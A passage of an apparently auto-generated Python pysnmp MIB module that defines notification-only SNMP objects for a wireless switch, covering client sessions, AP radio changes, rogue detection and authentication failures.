OctetString().subtype(subtypeSpec=ValueSizeConstraint(6, 6)).setFixedLength(6)).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioBSSID.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioBSSID.setDescription('The basic service set identifier of the rogue from the beacon frame reported by the AP during a detection sweep. This object is used within notifications and is not accessible.') rbtwsUserName = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 10), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsUserName.setStatus('current') if mibBuilder.loadTexts: rbtwsUserName.setDescription('The client user name as learned from the AAA process. This object is used within notifications and is not accessible.') rbtwsClientAuthServerIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 11), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAuthServerIp.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthServerIp.setDescription('The client authentication server ip address. This object is used within notifications and is not accessible.') rbtwsClientSessionState = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 12), RbtwsClientSessionState()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientSessionState.setStatus('current') if mibBuilder.loadTexts: rbtwsClientSessionState.setDescription('The state for a client session. This object is used within notifications and is not accessible.') rbtwsDAPNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsDAPNum.setStatus('current') if mibBuilder.loadTexts: rbtwsDAPNum.setDescription('The DAP number on the wireless switch. This object is used within notifications and is not accessible.') rbtwsClientIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 14), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientIp.setStatus('current') if mibBuilder.loadTexts: rbtwsClientIp.setDescription('The client ip address. This object is used within notifications and is not accessible.') rbtwsClientSessionId = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 15), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientSessionId.setStatus('current') if mibBuilder.loadTexts: rbtwsClientSessionId.setDescription('The unique global id for a client session. This object is used within notifications and is not accessible.') rbtwsClientAuthenProtocolType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 16), RbtwsClientAuthenProtocolType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAuthenProtocolType.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthenProtocolType.setDescription('The authentication protocol for a client. This object is used within notifications and is not accessible.') rbtwsClientVLANName = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 17), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientVLANName.setStatus('current') if mibBuilder.loadTexts: rbtwsClientVLANName.setDescription('The vlan name a client is on. This object is used within notifications and is not accessible.') rbtwsClientSessionStartTime = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 18), TimeTicks()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientSessionStartTime.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsClientSessionStartTime.setDescription("The start time of a client session, relative to the sysUptime. This object is used within notifications and is not accessible. Obsolete. Do not use it because it's not vital information and often *cannot* be implemented to match the declared semantics: a client session might have been created on another wireless switch, *before* the current switch booted (the local zero of sysUptime).") rbtwsClientFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 19), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientFailureCause.setStatus('current') if mibBuilder.loadTexts: rbtwsClientFailureCause.setDescription('Display string for possible failure cause for a client session. This object is used within notifications and is not accessible.') rbtwsClientRoamedFromPortNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 20), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 20))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientRoamedFromPortNum.setStatus('current') if mibBuilder.loadTexts: rbtwsClientRoamedFromPortNum.setDescription('The port number on the AC a client has roamed from. This object is used within notifications and is not accessible.') rbtwsClientRoamedFromRadioNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 21), RbtwsRadioNum()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientRoamedFromRadioNum.setStatus('current') if mibBuilder.loadTexts: rbtwsClientRoamedFromRadioNum.setDescription('The radio number of the AP the client is roamed from. This object is used within notifications and is not accessible.') rbtwsClientRoamedFromDAPNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 22), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 100))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientRoamedFromDAPNum.setStatus('current') if mibBuilder.loadTexts: rbtwsClientRoamedFromDAPNum.setDescription('The DAP number on the AC which reported this rogue during roam. This object is used within notifications and is not accessible.') rbtwsUserParams = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 23), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsUserParams.setStatus('current') if mibBuilder.loadTexts: rbtwsUserParams.setDescription('A display string of User Parameters for client user authorization attributes learned through AAA and/or used by the system. Note that the syntax will be (name=value, name=value,..) for the parsing purpose. This object is used within notifications and is not accessible.') rbtwsClientLocationPolicyIndex = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 24), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1024))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientLocationPolicyIndex.setStatus('current') if mibBuilder.loadTexts: rbtwsClientLocationPolicyIndex.setDescription('Index of the Location Policy rule applied to a user. This object is used within notifications and is not accessible.') rbtwsClientAssociationFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 25), RbtwsAssociationFailureType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAssociationFailureCause.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAssociationFailureCause.setDescription('The client association failure cause. This object is used within notifications and is not accessible.') rbtwsClientAuthenticationFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 26), RbtwsAuthenticationFailureType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAuthenticationFailureCause.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthenticationFailureCause.setDescription('The client authentication failure cause. This object is used within notifications and is not accessible.') rbtwsClientAuthorizationFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 27), RbtwsAuthorizationFailureType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAuthorizationFailureCause.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAuthorizationFailureCause.setDescription('The client authorization failure cause. Note that if it is the user-param, we would additionally expect the failure cause description to list the user attribute value that caused the failure. This object is used within notifications and is not accessible.') rbtwsClientFailureCauseDescription = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 28), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientFailureCauseDescription.setStatus('current') if mibBuilder.loadTexts: rbtwsClientFailureCauseDescription.setDescription('Display string for describing the client failure cause. This object is used within notifications and is not accessible.') rbtwsClientRoamedFromWsIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 29), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientRoamedFromWsIp.setStatus('current') if mibBuilder.loadTexts: rbtwsClientRoamedFromWsIp.setDescription('The system IP address of the AC (wireless switch) a client roamed from. This object is used within notifications and is not accessible.') rbtwsClientRoamedFromAccessType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 30), RbtwsAccessType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientRoamedFromAccessType.setStatus('current') if mibBuilder.loadTexts: rbtwsClientRoamedFromAccessType.setDescription('The client access type (ap, dap, wired) that a client roamed from. This object is used within notifications and is not accessible.') rbtwsClientAccessType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 31), RbtwsAccessType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientAccessType.setStatus('current') if mibBuilder.loadTexts: rbtwsClientAccessType.setDescription('The client access type (ap, dap, wired). This object is used within notifications and is not accessible. For new traps, use rbtwsClientAccessMode instead of this object.') rbtwsRadioMACAddress = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 32), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioMACAddress.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioMACAddress.setDescription('AP Radio MAC address. This object is used within notifications and is not accessible.') rbtwsRadioPowerChangeReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 33), RbtwsRadioPowerChangeType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioPowerChangeReason.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioPowerChangeReason.setDescription('The type of event that caused an AP radio power change; occurs due to auto-tune operation. This object is used within notifications and is not accessible.') rbtwsNewChannelNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 34), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 1024))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsNewChannelNum.setStatus('current') if mibBuilder.loadTexts: rbtwsNewChannelNum.setDescription('New channel number of the AP radio used after an auto tune event. This object is used within notifications and is not accessible.') rbtwsOldChannelNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 35), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 1024))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsOldChannelNum.setStatus('current') if mibBuilder.loadTexts: rbtwsOldChannelNum.setDescription('Old channel number of the AP radio used before an auto tune event. This object is used within notifications and is not accessible.') rbtwsChannelChangeReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 36), RbtwsChannelChangeType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsChannelChangeReason.setStatus('current') if mibBuilder.loadTexts: rbtwsChannelChangeReason.setDescription('The type of event that caused an AP radio channel change; occurs due to auto-tune operation. This object is used within notifications and is not accessible.') rbtwsRFDetectListenerListInfo = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 37), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 571))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRFDetectListenerListInfo.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectListenerListInfo.setDescription('The RF Detection Listener list info including a list of (listener mac, rssi, channel, ssid, time). There will be a maximum of 6 entries in the list. Formats: MAC: 18 bytes: %2.2X:%2.2X:%2.2X:%2.2X:%2.2X:%2.2X RSSI: 10 bytes: %10d CHANNEL: 3 bytes: %3d SSID: 32 bytes: %s TIME: 26 bytes: %s Maximum size per entry is 89+4+2 = 95 bytes. Maximum size of the string is 6*95= 571 bytes (include NULL). This object is used within notifications and is not accessible.') rbtwsRadioSSID = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 38), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioSSID.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioSSID.setDescription('The radio SSID string This object is used within notifications and is not accessible.') rbtwsNewPowerLevel = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 39), RbtwsPowerLevel()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsNewPowerLevel.setStatus('current') if mibBuilder.loadTexts: rbtwsNewPowerLevel.setDescription('New power level of the AP radio used after an auto tune event. This object is used within notifications and is not accessible.') rbtwsOldPowerLevel = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 40), RbtwsPowerLevel()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsOldPowerLevel.setStatus('current') if mibBuilder.loadTexts: rbtwsOldPowerLevel.setDescription('Old power level of the AP radio used before an auto tune event. This object is used within notifications and is not accessible.') rbtwsRadioPowerChangeDescription = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 41), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioPowerChangeDescription.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioPowerChangeDescription.setDescription('The radio power change description. In the case of reason being dup-pkts-threshold-exceed(1), and retransmit-threshold-exceed(2), clientMacAddress will be included in the description. This object is used within notifications and is not accessible.') rbtwsCounterMeasurePerformerListInfo = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 42), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsCounterMeasurePerformerListInfo.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsCounterMeasurePerformerListInfo.setDescription('A list of information for APs performing Counter Measures including a list of performer mac addresses. This object is used within notifications and is not accessible. Not used by any notification.') rbtwsClientDot1xState = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 43), RbtwsClientDot1xState()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientDot1xState.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDot1xState.setDescription('The state for a client 802.1X. This object is used within notifications and is not accessible.') rbtwsClientDot1xFailureCause = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 44), RbtwsDot1xFailureType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientDot1xFailureCause.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDot1xFailureCause.setDescription('The client 802.1X failure cause. This object is used within notifications and is not accessible.') rbtwsAPAccessType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 45), RbtwsAccessType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsAPAccessType.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsAPAccessType.setDescription('The access point access type (ap, dap,). This object is used within notifications and is not accessible. Not used by any notification.') rbtwsUserAccessType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 46), RbtwsUserAccessType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsUserAccessType.setStatus('current') if mibBuilder.loadTexts: rbtwsUserAccessType.setDescription('The user access type (MAC, WEB, DOT1X, LAST-RESORT). This object is used within notifications and is not accessible.') rbtwsClientSessionElapsedTime = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 47), TimeTicks()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientSessionElapsedTime.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsClientSessionElapsedTime.setDescription('The elapsed time for a client session. Obsoleted because session time is usually reported in seconds. This object is used within notifications and is not accessible.') rbtwsLocalId = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 48), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65000))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsLocalId.setStatus('current') if mibBuilder.loadTexts: rbtwsLocalId.setDescription('Local Id for the session. This object is used within notifications and is not accessible.') rbtwsRFDetectDoSType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 49), RbtwsRFDetectDoSType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRFDetectDoSType.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectDoSType.setDescription('The type of denial of service (DoS) attack. This object is used within notifications and is not accessible.') rbtwsSourceWsIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 50), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsSourceWsIp.setStatus('current') if mibBuilder.loadTexts: rbtwsSourceWsIp.setDescription('IP address of another AC (wireless switch). This object is used within notifications and is not accessible.') rbtwsClientVLANid = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 51), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 4095))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientVLANid.setStatus('current') if mibBuilder.loadTexts: rbtwsClientVLANid.setDescription('VLAN ID used by client traffic. This object is used within notifications and is not accessible.') rbtwsClientVLANtag = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 52), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 4095))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientVLANtag.setStatus('current') if mibBuilder.loadTexts: rbtwsClientVLANtag.setDescription('VLAN tag used by client traffic. This object is used within notifications and is not accessible.') rbtwsDeviceModel = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 53), DisplayString()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsDeviceModel.setStatus('current') if mibBuilder.loadTexts: rbtwsDeviceModel.setDescription('The model of a device in printable US-ASCII. If unknown (or not available), then the value is a zero length string. This object is used within notifications and is not accessible.') rbtwsDeviceSerNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 54), RbtwsApSerialNum()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsDeviceSerNum.setStatus('current') if mibBuilder.loadTexts: rbtwsDeviceSerNum.setDescription('The serial number of an AP in printable US-ASCII. If unknown (or not available), then the value is a zero length string. Should NOT be used to identify other devices, for example an AC (wireless switch). This object is used within notifications and is not accessible.') rbtwsRsaPubKeyFingerPrint = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 55), RbtwsApFingerprint()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRsaPubKeyFingerPrint.setStatus('current') if mibBuilder.loadTexts: rbtwsRsaPubKeyFingerPrint.setDescription('The hash of the RSA public key (of a key pair) in binary form that uniquely identifies the public key of an AP. This object is used within notifications and is not accessible.') rbtwsDAPconnectWarningType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 56), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("not-configured-fingerprint-connect", 1), ("secure-handshake-failure", 2), ("not-configured-fingerprint-required", 3), ("fingerprint-mismatch", 4)))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsDAPconnectWarningType.setStatus('current') if mibBuilder.loadTexts: rbtwsDAPconnectWarningType.setDescription("The type of DAP connect warning. The values are: not-configured-fingerprint-connect(1)...a DAP, which has an RSA keypair but did not have its fingerprint configured on the AC, has connected to the AC when 'dap security' set to 'OPTIONAL' secure-handshake-failure(2).............a DAP tried to connect to the AC with security, but the handshake failed not-configured-fingerprint-required(3)..a DAP tried to connect to the AC with security, but 'dap security' set to 'REQUIRED', and no fingerprint was configured for the DAP fingerprint-mismatch(4).................a DAP tried to connect to the AC with security and its fingerprint was configured, but the fingerprint did not match the computed one This object is used within notifications and is not accessible.") rbtwsClientMACAddress2 = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 57), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientMACAddress2.setStatus('current') if mibBuilder.loadTexts: rbtwsClientMACAddress2.setDescription('MAC address of the second client of interest. This object is used within notifications and is not accessible.') rbtwsApAttachType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 58), RbtwsApAttachType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApAttachType.setStatus('current') if mibBuilder.loadTexts: rbtwsApAttachType.setDescription('How the AP is attached to the AC (directly or via L2/L3 network). This object is used within notifications and is not accessible.') rbtwsApPortOrDapNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 59), RbtwsApPortOrDapNum()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApPortOrDapNum.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsApPortOrDapNum.setDescription('The Port Number if the AP is directly attached, or the CLI-assigned DAP Number if attached via L2/L3 network. This object is used within notifications and is not accessible. Obsoleted by rbtwsApNum. (In 6.0, direct- and network-attached APs were unified.)') rbtwsApName = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 60), DisplayString()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApName.setStatus('current') if mibBuilder.loadTexts: rbtwsApName.setDescription("The name of the AP, as assigned in AC's CLI; defaults to AP<Number> (examples: 'AP01', 'AP22', 'AP333', 'AP4444'); could have been changed from CLI to a meaningful name, for example the location of the AP (example: 'MeetingRoom73'). This object is used within notifications and is not accessible.") rbtwsApTransition = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 61), RbtwsApTransition()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApTransition.setStatus('current') if mibBuilder.loadTexts: rbtwsApTransition.setDescription('AP state Transition, as seen by the AC. This object is used within notifications and is not accessible.') rbtwsApFailDetail = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 62), RbtwsApFailDetail()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApFailDetail.setStatus('current') if mibBuilder.loadTexts: rbtwsApFailDetail.setDescription("Detailed failure code for some of the transitions specified in 'rbtwsApTransition' object. This object is used within notifications and is not accessible.") rbtwsRadioType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 63), RbtwsRadioType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioType.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioType.setDescription('Indicates the AP Radio Type, as seen by AC. This object is used within notifications and is not accessible.') rbtwsRadioConfigState = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 64), RbtwsRadioConfigState()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioConfigState.setStatus('current') if mibBuilder.loadTexts: rbtwsRadioConfigState.setDescription('Indicates the Radio State, as seen by the AC. This object is used within notifications and is not accessible.') rbtwsApConnectSecurityType = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 65), RbtwsApConnectSecurityType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApConnectSecurityType.setStatus('current') if mibBuilder.loadTexts: rbtwsApConnectSecurityType.setDescription('Indicates the security level of the connection between AP and AC. This object is used within notifications and is not accessible.') rbtwsApServiceAvailability = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 66), RbtwsApServiceAvailability()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApServiceAvailability.setStatus('current') if mibBuilder.loadTexts: rbtwsApServiceAvailability.setDescription('Indicates the level of wireless service availability. This object is used within notifications and is not accessible.') rbtwsApWasOperational = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 67), RbtwsApWasOperational()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsApWasOperational.setStatus('current') if mibBuilder.loadTexts: rbtwsApWasOperational.setDescription('Indicates whether the AP was operational before a transition occured. This object is used within notifications and is not accessible.') rbtwsClientTimeSinceLastRoam = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 68), Unsigned32()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientTimeSinceLastRoam.setStatus('current') if mibBuilder.loadTexts: rbtwsClientTimeSinceLastRoam.setDescription('The time in seconds since the most recent roam of a given client. This object is used within notifications and is not accessible.') rbtwsClientIpAddrChangeReason = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 69), RbtwsClientIpAddrChangeReason()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientIpAddrChangeReason.setStatus('current') if mibBuilder.loadTexts: rbtwsClientIpAddrChangeReason.setDescription('Indicates the reason why client IP address changed. This object is used within notifications and is not accessible.') rbtwsRFDetectRogueAPMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 70), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRFDetectRogueAPMacAddr.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectRogueAPMacAddr.setDescription('Describes the MAC address of the Rogue AP the transmitter is connected to. This object is used within notifications and is not accessible.') rbtwsBlacklistingRemainingTime = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 71), Unsigned32()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsBlacklistingRemainingTime.setStatus('current') if mibBuilder.loadTexts: rbtwsBlacklistingRemainingTime.setDescription('The time in seconds remaining until a given transmitter could be removed from the Black List. This object is used within notifications and is not accessible.') rbtwsBlacklistingCause = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 72), RbtwsBlacklistingCause()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsBlacklistingCause.setStatus('current') if mibBuilder.loadTexts: rbtwsBlacklistingCause.setDescription('Indicates the reason why a given transmitter is blacklisted. This object is used within notifications and is not accessible.') rbtwsNumLicensedActiveAPs = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 73), Unsigned32()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsNumLicensedActiveAPs.setStatus('current') if mibBuilder.loadTexts: rbtwsNumLicensedActiveAPs.setDescription('Indicates the maximum (licensed) number of active APs for this AC. This object is used within notifications and is not accessible.') rbtwsClientDynAuthorClientIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 74), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientDynAuthorClientIp.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDynAuthorClientIp.setDescription('The dynamic authorization client IP address which caused the change of authorization. This object is used within notifications and is not accessible.') rbtwsChangedUserParamOldValues = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 75), RbtwsUserAttributeList()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsChangedUserParamOldValues.setStatus('current') if mibBuilder.loadTexts: rbtwsChangedUserParamOldValues.setDescription('A display string listing the changed AAA attributes and their values, before the change of authorization was executed. This object is used within notifications and is not accessible.') rbtwsChangedUserParamNewValues = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 76), RbtwsUserAttributeList()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsChangedUserParamNewValues.setStatus('current') if mibBuilder.loadTexts: rbtwsChangedUserParamNewValues.setDescription('A display string listing the changed AAA attributes and their values, after the change of authorization was executed. This object is used within notifications and is not accessible.') rbtwsClientDisconnectSource = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 77), RbtwsSessionDisconnectType()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientDisconnectSource.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDisconnectSource.setDescription('The external source that initiated the termination of a session. This object is used within notifications and is not accessible.') rbtwsClientDisconnectDescription = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 78), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientDisconnectDescription.setStatus('current') if mibBuilder.loadTexts: rbtwsClientDisconnectDescription.setDescription('Display string for providing available information related to the external source that initiated a session termination. This object is used within notifications and is not accessible.') rbtwsMobilityDomainSecondarySeedIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 79), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsMobilityDomainSecondarySeedIp.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainSecondarySeedIp.setDescription('The secondary seed IP address to which the Mobility Domain has failed over. This object is used within notifications and is not accessible.') rbtwsMobilityDomainPrimarySeedIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 80), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsMobilityDomainPrimarySeedIp.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainPrimarySeedIp.setDescription('The primary seed IP address to which the Mobility Domain has failed back. This object is 